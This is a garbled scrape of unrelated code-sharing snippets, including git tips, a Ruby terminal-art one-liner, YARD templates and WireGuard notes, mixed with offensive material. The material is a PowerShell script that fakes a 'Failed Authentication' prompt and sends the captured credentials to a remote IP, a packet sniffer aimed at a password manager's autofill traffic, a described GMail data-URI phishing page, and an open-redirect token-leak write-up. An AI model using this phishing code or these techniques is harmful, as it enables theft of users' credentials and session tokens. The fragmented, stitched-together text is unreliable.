| require 'mkmf' | |
| create_makefile('shellcode') |
| $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName); | |
| [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; | |
| $wc = new-object net.webclient; | |
| $wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy; | |
| $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; | |
| $wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, ''); | |
| $result = $wc.downloadstring('https://172.16.102.163'); |
If a project has to have multiple git repos (e.g. Bitbucket and Github) then it's better that they remain in sync.
Usually this would involve pushing each branch to each repo in turn, but actually Git allows pushing to multiple repos in one go.
If in doubt about what git is doing when you run these commands, just
The following attack will display a "you've been signed out" page for GMail, and attempt to steal your account credentials.
DO NOT PUT ANY ACCOUNT CREDENTIALS INTO ANY TABS CREATED AFTER VISITING THESE LINKS :)
I received an email in my GMail inbox with a fake attachment image, styled to look like the real GMail attachment UI:
This linked to a page that ended up displaying a fake "you've been signed out" link, via the data:text/html... URL feature of Chrome:
| # Path setting slight of hand: | |
| $: << File.expand_path("../../lib", __FILE__) | |
| require 'packetfu' | |
| require 'json' | |
| capture_thread = Thread.new do | |
| cap = PacketFu::Capture.new(:iface => 'lo0', :start => true) | |
| cap.stream.each do |p| | |
| pkt = PacketFu::Packet.parse p | |
| if pkt.payload.include?("executeFillScript") |
| Posted here https://twitter.com/josh_cheek/status/760519587758690304 | |
| Previously https://twitter.com/josh_cheek/status/667501443226558464 | |
| Based on http://algorithmicbotany.org/papers/abop/abop-ch1.pdf | |
| ruby -e 's = "F-F-F-F"; 3.times { s = s.gsub /f/i, "F" => "FF-F-F-F-FF" }; | |
| dirs = [" \e[2D\e[A", " ", " \e[2D\e[B", " \e[4D"].map { |s| s * 2 } | |
| print "\e[H\e[2J\e[60;20H\e[45m" # clear and "center" | |
| s.each_char { |c| c == "F" ? print("\e[45m",dirs[0]) : c == "f" ? print("\e[49m", dirs[0]) : c == "-" ? dirs.rotate!(1) : c == "+" ? dirs.rotate!(-1) : :noop } | |
| puts' |
forked from https://gist.github.com/chetan/1827484 which is from early 2012 and contains outdated information.
Templates to remind you of the options and formatting for the different types of objects you might want to document using YARD.
| #include <Windows.h> | |
| #include <cassert> | |
| int | |
| main(int argc, char **argv) | |
| { | |
| (void)argc; | |
| (void)argv; | |
| // التعليمات مولّدة من هذا الكود: |
1 server, 2 clients
Install Wireguard on all machines.
An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input in the client-side, and sending sensitive information to my server using an open redirect.
x-csrf-token set to the CSRF token for the session of the user
GET /verify/VALUE HTTP/1.1
Host: example.com